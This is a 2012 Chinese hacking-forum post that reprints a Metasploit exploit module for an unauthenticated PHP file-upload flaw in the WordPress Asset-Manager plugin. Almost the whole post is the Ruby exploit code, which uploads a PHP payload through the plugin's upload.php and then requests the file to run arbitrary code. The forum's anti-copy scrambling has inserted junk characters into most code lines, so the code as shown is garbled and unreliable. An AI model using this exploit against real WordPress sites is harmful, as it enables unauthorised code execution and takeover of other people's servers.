找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2129|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
$ L4 {/ W) g2 C2 d5 s
6 C* P! x5 c# e8 {3 d$ h##
/ C8 ]1 C: J% L+ u6 |7 r# This file is part of the Metasploit Framework and may be subject to
2 i) F: {( U0 q7 k# redistribution and commercial restrictions. Please see the Metasploit+ V/ h+ x6 j: r
# Framework web site for more information on licensing and terms of use.
0 W* o: x6 y+ u* R+ t#   http://metasploit.com/framework/% a3 L7 h4 |4 P' Q
##& I" F2 y5 w, F7 |

: N1 `3 c1 Y6 A- g/ ]  Mrequire 'msf/core'
: d- e! v3 [% _8 e! Y& xrequire 'msf/core/exploit/php_exe'7 O5 L/ }4 f% t: O
( W7 S, u! I9 X: }
class Metasploit3 < Msf::Exploit::Remote
1 S6 K4 o  Z; o, h1 w  Rank = ExcellentRanking
7 D9 G$ n* K5 U
, d0 ]% N1 Z5 V  include Msf::Exploit::Remote::HttpClient
, c! _( G8 U  z3 x  include Msf::Exploit:hpEXE
$ d6 ^; p  f5 K% _* u: l
' _! x- ^" s( O5 v4 o  def initialize(info = {})5 O' k1 g" i. H* ]
    super(update_info(info,* ^; C. |* V+ ?) h4 }/ I( ?0 K
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
2 X8 j  [9 _& A% C. x' B; N      'Description'    => %q{. n- |- ^" e. r9 `- C' ?# B& k4 Z. H2 L
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress4 A( D) j* e$ w. U
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
4 y# v" H1 T; N2 h6 h        temp directory without authentication, which results in arbitrary code execution.
7 e* I( l% @( f: k5 x$ C* o9 R( A      },
6 D! X: a& b8 @9 _$ X, b% [      'Author'         =>. \2 _8 J) m( Z
        [0 R" c7 e( T+ I: W0 o
          'Sammy FORGIT', # initial discovery
9 Q. Q6 L1 S) E" g' @7 p          'James Fitts <fitts.james[at]gmail.com>' # metasploit module2 u- t! {% V* i  Z  X
        ],
. f+ ^9 L; ?( L0 R7 D      'License'        => MSF_LICENSE,
* j" r9 J: P! i8 d2 i8 W1 L. P      'References'     =>0 m/ x# u+ |& O; a" s4 F
        [
$ O8 C+ B- K8 j          [ 'OSVDB', '82653' ],- p1 Y; w! i2 U% ~4 w+ G' E& Y$ w
          [ 'BID', '53809' ],
$ A. R2 S4 F8 e          [ 'EDB', '18993' ],7 v+ t' H1 l; {
          [ 'URL', 'http:// www.myhack58.com /' ]
5 V2 m7 R, ], [) ~( G3 }" V. x# ]        ],, l" Q' H5 X. f4 P
      'Payload'       =>
8 `- w! B7 G9 ^        {+ T' C2 l1 M+ \0 S/ K" Z7 e
          'BadChars' => "\x00",  D8 J/ T% ?* T' W5 w# }7 u$ M1 ^
        },. a9 g9 @5 ?" B8 y6 c
      'Platform'       => 'php',! z, c8 O7 h6 m6 h
      'Arch'           => ARCH_PHP,9 J# N( K1 l% \7 M: Z
      'Targets'        =>4 X6 ]7 W4 _8 z1 O+ ]% d6 D
        [
$ c6 m8 d$ b  D+ g/ b          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],' ]$ `  H1 V  E7 F* K) Y0 l! x
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
" R! @' [* `- }; _$ n* m        ],) @% {7 ~) v8 i# d3 W' c
      'DefaultTarget' => 0,6 D) o: m2 ~% n) L2 G3 K
      'DisclosureDate' => 'May 26 2012'))2 s. M+ _. I) g2 f7 m+ V, o
# Y& k5 R, L( u! A% p6 j+ Q
    register_options(  p# H7 t/ h: N% x: C9 ~# Z* y, U
      [) d4 [% a7 a" J9 y" r
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
' [0 w/ K6 \! H  g4 k6 b# P      ], self.class)
$ Y6 b1 U. O2 ~  end* n3 E+ S  h1 G8 s
: \4 U. o2 K; {" ?; R9 H* ]/ j
  def exploit
. M" |4 {. S4 e3 n    uri =  target_uri.path& V. _  g. c, V' R2 i
    uri << '/' if uri[-1,1] != '/'6 |7 m2 K$ L6 ]1 z/ ^' S
    peer = "#{rhost}:#{rport}"
0 R  Q& |( k6 K$ T4 X4 P% _2 w+ Z1 D) F    payload_name = "#{rand_text_alpha(5)}.php"
# e; v" l( K: G/ F$ m0 {6 x/ R    php_payload = get_write_exec_payload(:unlink_self=>true)
& F7 H" [, o) n# F( j$ q ) x7 V( N5 O: a: a# `  d
    data = Rex::MIME::Message.new
( h  s) h/ m% j$ Y) B2 M    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")0 b6 S; j9 F9 e3 `3 g
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')  m, E! s9 n# C  U6 _

$ M  B  c, p; m7 o    print_status("#{peer} - Uploading payload #{payload_name}")
4 a. m& @8 T/ a: x/ s    res = send_request_cgi({+ O. i# x% E3 F* C# y
      'method'  => 'POST',0 o; G4 x, N  m7 W% A( y2 R. V/ u* [8 I
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",. u1 ]1 j+ k8 i" I  X1 z
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",1 L9 o: Y" s9 s9 N! W& Z$ V
      'data'    => post_data3 h+ X$ T% f2 R4 g' l0 m
    })8 o. G% C. ?. ~( r. [: f
% ^3 a3 g" Z+ [$ K
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
/ O5 C0 C5 p& L: c1 B) F5 @      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")3 M  e' Z2 S+ W) Y0 g
end4 k. |" Q% e5 |, c6 |. t
/ J$ |: L- V. m! A+ J$ q
    print_status("#{peer} - Executing payload #{payload_name}")
5 O3 B) n! j) q  @0 ?4 v2 l4 d    res = send_request_raw({. o, A% [, {( G
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}"," D& G' \3 F& \4 H: f# j
      'method'  => 'GET'
2 E2 S0 A9 e! n: K- o& q; C3 A+ ~    })4 d* o0 N" F# B* Y& h% a7 I
5 l$ ^0 Z9 k1 ?( |
    if res and res.code != 2002 A0 D( m# S1 `
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
# {- V8 d' V7 Q    end% P' L7 V, ^* O
  end
) ]  B% v4 c% `# X7 C$ cend
' P4 m/ [# X' @% H9 ^- S' S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表